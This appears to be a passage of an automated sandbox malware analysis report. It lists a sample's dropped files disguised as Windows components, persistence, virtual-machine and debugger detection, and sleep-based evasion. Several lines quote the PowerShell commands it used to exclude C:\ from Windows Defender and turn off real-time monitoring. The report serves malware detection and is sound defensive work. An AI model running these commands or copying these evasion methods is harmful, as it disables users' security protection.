                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7331Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1959Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6414Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3387Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8565
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1144
                                  Source: C:\Windows\Tasks\IntelConfigService.exeWindow / User API: threadDelayed 7109
                                  Source: C:\Windows\Tasks\Superfetch.exeWindow / User API: threadDelayed 8545
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\AtXEfMql.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_ctypes.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_socket.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_bz2.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\QLwtIihK.logJump to dropped file
                                  Source: C:\ProgramData\migrate.exeDropped PE file which has not been started: C:\Windows\Tasks\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\IZEltFrY.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\HcddYGcd.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\brrRNKBn.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\Aepdvrho.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\quigFLkP.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\EjOumJqe.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\syIwhxhC.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\IIxTfkxV.logJump to dropped file
                                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\sPPOvTaE.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_queue.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\unicodedata.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\hbkYLHfW.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_hashlib.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\UtDRkwHy.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\KbrUPpvT.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\python38.dllJump to dropped file
                                  Source: C:\ProgramData\migrate.exeDropped PE file which has not been started: C:\Windows\Tasks\WinRing0x64.sysJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\DmmmRJbk.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\OIKLmzcP.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\UBnkPfhE.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\tvjECxvw.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_lzma.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\fZypqYbb.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\vrXfSuSA.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\select.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_ssl.pydJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\bjHzibbh.logJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\mFfXERcN.logJump to dropped file
                                  Source: C:\Windows\Tasks\MSTask.exeDropped PE file which has not been started: C:\Windows\Temp\_MEI81722\_cffi_backend.cp38-win_amd64.pydJump to dropped file
                                  Source: C:\Windows\Bridgeprovider.exeDropped PE file which has not been started: C:\Users\user\Desktop\OShKWlwM.logJump to dropped file
                                  Source: C:\Windows\Tasks\Wmiic.exeEvaded block: after key decision
                                  Source: C:\Windows\Tasks\Wmiic.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                  Source: C:\Windows\Tasks\Wrap.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                  Source: C:\ProgramData\migrate.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_26-23515
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23774
                                  Source: C:\Windows\Tasks\1.exeEvasive API call chain: GetLocalTime,DecisionNodes
                                  Source: C:\Windows\Tasks\Wmiic.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_31-14914
                                  Source: C:\Windows\Tasks\MSTask.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\Windows\Tasks\Wmiic.exeAPI coverage: 4.6 %
                                  Source: C:\Windows\Tasks\Wmiic.exeAPI coverage: 6.6 %
                                  Source: C:\Windows\Tasks\Wrap.exeAPI coverage: 8.2 %
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 6414 > 30Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep count: 3387 > 30Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep count: 8565 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep count: 1144 > 30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\Tasks\IntelConfigService.exe TID: 7892Thread sleep count: 7109 > 30
                                  Source: C:\Windows\Tasks\IntelConfigService.exe TID: 7892Thread sleep time: -71090s >= -30000s
                                  Source: C:\Windows\Tasks\Superfetch.exe TID: 5000Thread sleep count: 8545 > 30
                                  Source: C:\Windows\Tasks\Superfetch.exe TID: 5000Thread sleep time: -85450s >= -30000s
                                  Source: C:\Windows\Bridgeprovider.exe TID: 7464Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\Tasks\IntelConfigService.exeLast function: Thread delayed
                                  Source: C:\Windows\Tasks\IntelConfigService.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\Tasks\Superfetch.exeLast function: Thread delayed
                                  Source: C:\Windows\Tasks\Superfetch.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\Bridgeprovider.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0087A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0087A69B
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0088C220
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0011A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,26_2_0011A69B
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,26_2_0012C220
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0C9E0 FindFirstFileExW,42_2_00007FF726D0C9E0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D97B80 FindFirstFileExW,FindClose,56_2_00007FF7B1D97B80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA8110 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,56_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB20D4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,56_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,60_2_003EA69B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,60_2_003FC220
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004462 _errno,malloc,_errno,memset,MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,free,_errno,FindFirstFileW,_errno,FindNextFileW,WideCharToMultiByte,62_2_00007FFDFB004462
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088E6A3 VirtualQuery,GetSystemInfo,0_2_0088E6A3
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Bridgeprovider.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                  Source: MSTask.exe, 00000038.00000003.1916985865.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
                                  Source: IYXE4Uz61k.exe, 00000000.00000003.1743680815.000000000315E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
                                  Source: migrate.exe, 0000001A.00000002.1869307386.0000000008BD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\%'
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: AdditionsFacilityType_VBoxTrayClient
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: aVmNetTx
                                  Source: Superfetch.exe, 00000037.00000000.1913135865.00007FF6384E8000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: aVmNetRx
                                  Source: ApplicationsFrameHost.exe, 00000035.00000002.4148260496.0000020033241000.00000004.00000020.00020000.00000000.sdmp, ApplicationsFrameHost.exe, 00000035.00000002.4148260496.00000200331F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: migrate.exe, 0000001A.00000002.1869307386.0000000008BD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|'Y
                                  Source: MSTask.exe, 0000003E.00000002.4149515086.00000268D1820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeAPI call chain: ExitProcess graph end nodegraph_0-23965
                                  Source: C:\ProgramData\migrate.exeAPI call chain: ExitProcess graph end nodegraph_26-23665
                                  Source: C:\Windows\Tasks\Wmiic.exeAPI call chain: ExitProcess graph end nodegraph_31-14916
                                  Source: C:\Windows\Tasks\Wmiic.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\Tasks\1.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                                  Anti Debugging

                                  barindex
                                  Found API chain indicative of debugger detection
                                  Source: C:\Windows\Tasks\Wrap.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
                                  Potentially malicious time measurement code found
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0063AC62_2_00007FFDFB0063AC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0064EC62_2_00007FFDFB0064EC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0063AC rdtsc 62_2_00007FFDFB0063AC
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088F838
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140023A88 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,31_2_0000000140023A88
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00897DEE mov eax, dword ptr fs:[00000030h]0_2_00897DEE
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_00137DEE mov eax, dword ptr fs:[00000030h]26_2_00137DEE
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_00407DEE mov eax, dword ptr fs:[00000030h]60_2_00407DEE
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0089C030 GetProcessHeap,0_2_0089C030
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\Tasks\MSTask.exeProcess token adjusted: Debug
                                  Source: C:\Windows\Tasks\MSTask.exeProcess token adjusted: Debug
                                  Source: C:\Windows\Bridgeprovider.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0088F838
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F9D5 SetUnhandledExceptionFilter,0_2_0088F9D5
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0088FBCA
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_00898EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00898EBD
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_0012F838
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012F9D5 SetUnhandledExceptionFilter,26_2_0012F9D5
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_0012FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_0012FBCA
                                  Source: C:\ProgramData\migrate.exeCode function: 26_2_00138EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00138EBD
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140018800 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0000000140018800
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140023D20 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_0000000140023D20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_0000000140020180 SetUnhandledExceptionFilter,31_2_0000000140020180
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014001B6C4 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_000000014001B6C4
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140018800 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_0000000140018800
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140023D20 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0000000140023D20
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140020180 SetUnhandledExceptionFilter,37_2_0000000140020180
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001B6C4 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_000000014001B6C4
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CF6FE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FF726CF6FE0
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CF7558 SetUnhandledExceptionFilter,42_2_00007FF726CF7558
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CF73B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF726CF73B0
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CFE454 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FF726CFE454
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D9BA5C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_00007FF7B1D9BA5C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D9B1B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,56_2_00007FF7B1D9B1B0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D9BC04 SetUnhandledExceptionFilter,56_2_00007FF7B1D9BC04
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAAE98 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_00007FF7B1DAAE98
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,60_2_003FF838
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FF9D5 SetUnhandledExceptionFilter,60_2_003FF9D5
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,60_2_003FFBCA
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_00408EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,60_2_00408EBD
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004FDE __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,62_2_00007FFDFB004FDE
                                  Source: C:\Windows\Bridgeprovider.exeMemory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Adds extensions / path to Windows Defender exclusion list
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Disables Windows Defender (via service or powershell)
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Modifies Windows Defender protection settings
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
